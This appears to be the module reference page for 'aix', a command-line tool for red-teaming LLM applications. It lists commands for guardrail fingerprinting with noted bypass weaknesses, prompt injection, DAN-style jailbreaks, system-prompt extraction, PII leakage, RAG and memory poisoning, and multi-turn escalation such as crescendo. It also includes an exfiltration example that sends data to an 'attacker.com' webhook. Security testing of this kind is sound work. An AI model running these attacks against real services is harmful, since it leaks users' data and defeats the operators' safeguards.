-
Notifications
You must be signed in to change notification settings - Fork 5
Modules
Every module shares the same common options. Module-specific options are listed per section.
Reconnaissance and fingerprinting. Runs 8 detection steps in sequence: API structure, authentication, input filters, rate limits, model fingerprinting, behavior analysis, context detection, and guardrail fingerprinting.
aix recon https://api.target.com/chat -k sk-xxx
aix recon -r request.txt -p "messages[0].content"
aix recon https://api.target.com/chat -k sk-xxx -o profile.jsonGuardrail detection (step 8) identifies which safety provider is deployed:
| Provider | Detection method |
|---|---|
| OpenAI Moderation API |
flagged, category_scores JSON fields |
| Azure Content Safety | HTTP 400 + ResponsibleAIPolicyViolation, apim-request-id header |
| AWS Bedrock Guardrails |
INTERVENED, guardrailAction fields + amazon-bedrock-guardrailaction header |
| Llama Guard |
[UNSAFE] / unsafe\nS<category> response prefix |
| Lakera Guard |
x-lakera-guard response headers |
| Perspective API |
attributeScores, TOXICITY fields |
| NeMo Guardrails |
colang, rails.*blocked patterns |
| Custom filter | Refusal patterns when no known signature matches |
Output includes: provider, confidence %, sensitivity profile per content category, and known bypass weaknesses. Stored in session DB automatically.
Probabilistic LLM identification. Two strategies: embedding-based (high accuracy, requires aix-framework[ml]) and pattern-based (default, regex + softmax scoring).
aix fingerprint https://api.target.com -k sk-xxx
aix fingerprint -r request.txt -p "messages[0].content"Prompt injection — direct injection, indirect injection, context manipulation, instruction override.
aix inject https://api.target.com -k sk-xxx
aix inject -r request.txt -p "messages[0].content"
aix inject https://api.target.com -k sk-xxx --evasion aggressiveATLAS: AML.T0048 — OWASP: LLM01
Safety restriction bypass — DAN variants, character roleplay, developer mode, hypothetical framing.
aix jailbreak https://api.target.com -k sk-xxx
aix jailbreak -r request.txt -p "messages[0].content"ATLAS: AML.T0051 — OWASP: LLM01
System prompt extraction — direct extraction, roleplay tricks, translation abuse, repeat/format abuse.
aix extract https://api.target.com -k sk-xxx
aix extract -r request.txt -p "messages[0].content"ATLAS: AML.T0056 — OWASP: LLM07
Training data and PII leakage — memorized data, PII in responses, RAG document leakage, architecture info.
aix leak https://api.target.com -k sk-xxx
aix leak -r request.txt -p "messages[0].content"ATLAS: AML.T0056, AML.T0057 — OWASP: LLM02, LLM06
Data exfiltration channels — markdown image injection, link injection, hidden iframes, webhook callbacks.
aix exfil https://api.target.com -k sk-xxx --webhook https://attacker.com
aix exfil -r request.txt -p "messages[0].content"ATLAS: AML.T0025, AML.T0024 — OWASP: LLM02
AI agent exploitation — tool abuse, unauthorized actions, privilege escalation, code execution.
aix agent https://agent.target.com -k sk-xxx
aix agent -r request.txt -p "messages[0].content"ATLAS: AML.T0043, AML.T0048 — OWASP: LLM08
Denial of service — token exhaustion, rate limit testing, infinite loop prompts, memory exhaustion.
aix dos https://api.target.com -k sk-xxx
aix dos -r request.txt -p "messages[0].content"ATLAS: AML.T0029 — OWASP: LLM04
Edge cases and malformed input — unicode fuzzing, format string attacks, boundary testing, encoding attacks.
aix fuzz https://api.target.com -k sk-xxx
aix fuzz -r request.txt -p "messages[0].content" --iterations 500ATLAS: AML.T0043 — OWASP: LLM01
Context and memory attacks — context window overflow, conversation history poisoning, persistent memory manipulation, context bleeding.
aix memory https://api.target.com -k sk-xxx
aix memory -r request.txt -p "messages[0].content"ATLAS: AML.T0048 — OWASP: LLM03
RAG-specific attacks — indirect injection via documents, context poisoning, source manipulation, retrieval bypass, knowledge base extraction.
aix rag https://api.target.com -k sk-xxx
aix rag -r request.txt -p "messages[0].content"| Category | Risk |
|---|---|
| Indirect Injection | CRITICAL |
| Context Poisoning | CRITICAL |
| Source Manipulation | HIGH |
| Retrieval Bypass | HIGH |
| KB Extraction | MEDIUM |
| Chunk Boundary | MEDIUM |
ATLAS: AML.T0043, AML.T0048 — OWASP: LLM01, LLM02
Multi-turn conversation attacks that bypass single-shot defenses by building context across turns.
aix multiturn https://api.target.com -k sk-xxx
aix multiturn https://api.target.com -k sk-xxx --category crescendo --level 3
aix multiturn https://api.target.com -k sk-xxx --max-turns 5 --turn-delay 1.0| Category | Description |
|---|---|
crescendo |
Gradually escalate from benign to malicious |
trust_building |
Establish rapport before payload delivery |
context_poisoning |
Define terms early, abuse them later |
role_lock |
Deep persona establishment |
memory_injection |
Inject false memories |
instruction_layering |
Stack partial instructions across turns |
cognitive_overload |
Overwhelm before attack |
authority_transfer |
Leverage perceived expertise |
Module-specific options:
| Option | Description |
|---|---|
--category |
Filter by attack category |
--max-turns |
Maximum turns per sequence (default: 10) |
--turn-delay |
Delay between turns in seconds (default: 0.5) |
Execute multi-step YAML attack playbooks. See Attack Chains for full syntax.
aix chain https://api.target.com -k sk-xxx -P full_compromise
aix chain --list
aix chain --show full_compromise
aix chain --dry-run -P quick_scanRun all modules sequentially for a full assessment.
aix scan https://api.target.com -k sk-xxx
aix scan -r request.txt -p "messages[0].content"| Option | Short | Description |
|---|---|---|
--request |
-r |
Burp Suite request file |
--param |
-p |
JSON path to injection point (e.g. messages[0].content) |
--key |
-k |
API key |
--profile |
-P |
Saved profile name |
--verbose |
-v |
-v shows reasons, -vv shows debug |
--output |
-o |
Save results to JSON file |
--proxy |
HTTP proxy (host:port) |
|
--cookie |
-C |
Cookies (key=value; ...) |
--headers |
-H |
Custom headers (key:value; ...) |
--format |
-F |
Body format: json, form, multipart
|
--level |
Test depth 1–5 (default: 1) | |
--risk |
Risk level 1–3 (default: 1) | |
--show-response |
Print AI response for each finding | |
--verify-attempts |
-va |
Confirmation attempts before reporting a finding |
--no-bypass |
Disable automatic guardrail bypass | |
--ai |
AI provider for eval/context: openai, anthropic, ollama, gemini
|
|
--ai-key |
API key for AI provider | |
--ai-model |
Model for AI features | |
--generate |
-g |
Generate N context-aware payloads |
--no-eval |
Disable LLM-as-a-Judge evaluation | |
--no-context |
Disable AI context gathering | |
--response-path |
-rp |
JSON path to extract response (e.g. choices.0.message.content) |
--response-regex |
-rr |
Regex to extract content from response |
| Option | Description |
|---|---|
--refresh-url |
URL to fetch a new session token |
--refresh-regex |
Regex to extract token from refresh response |
--refresh-param |
Parameter to update with new token |
--refresh-error |
String/regex in response that triggers refresh |
| Option | Description |
|---|---|
--chat-id-path |
Dot-path to extract chat ID from response |
--chat-id-param |
Request field to inject the captured chat ID into |
--new-chat |
Force new conversation per payload |
--reuse-chat |
Reuse same chat ID across all payloads |